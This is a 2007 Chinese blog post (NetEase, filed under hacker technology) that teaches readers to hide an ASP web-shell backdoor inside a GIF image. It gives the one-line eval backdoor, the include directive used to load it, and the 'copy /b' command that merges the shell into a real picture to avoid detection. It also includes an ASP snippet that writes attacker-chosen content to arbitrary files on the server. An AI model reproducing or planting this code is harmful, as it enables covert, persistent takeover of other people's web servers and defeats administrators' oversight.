注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

我的博客

小猪哥

 
 
 

日志

 
 

图片ASP木马[精品]  

2007-03-08 19:30:23|  分类: 黑客技术 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。

asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp后门还是我众马中的首选,现在我们就把它作成图片asp木马。

首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:

<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>

一、include给我们指路

接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。

然后我们新建一个asp文件,在里面写入<!--#include file="asp.gif"-->,当然你也可以把它插入到任何asp文件的头部或者尾部,仅仅就这一句话。asp.gif就是冰狐浪子asp木马服务端,也是一句话,这个图片asp木马就做好了。

不过这里还有一个小问题,虽然网站里图片很多,但如果管理员不小心打开这个图片,在IE上显示的是一把小红叉,他会怎么想呢?

为了不让人怀疑,要让我们的图片美人动起来,让它成为真正的gif文件!

二、copy给我们加油

把asp.gif改名为asp.asp,然后去找个图片来,至于什么内容的图片,就看你自己的爱好啦,不过最好不要超过20kb,大了执行的速度就慢,把它保存为1.gif。

再启动windows下的dos窗口,键入copy 1.gif /b + asp.asp /a asp.gif

其中参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。这里要注意文件的顺序。执行完后就会生成asp.gif,这就是我们的冰狐浪子asp木马服务端。不过现在它已经伪装成一个婷婷玉立的美人了,嘿嘿!如果要插入其他asp文件中,请插入下面代码

<%

on error resume next

id=request("id")

if request("id")=1 then

testfile=Request.form("name")

msg=Request.form("message")

set fs=server.createObject("scripting.filesystemobject")

set thisfile=fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(""&msg& "")

thisfile.close

set fs = nothing

%>

<form method="POST" ACTION="你插入文件的文件名?id=1">

<!--#include file="UploadFile/asp.gif"-->

<% end if %>

  评论这张
 
阅读(165)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017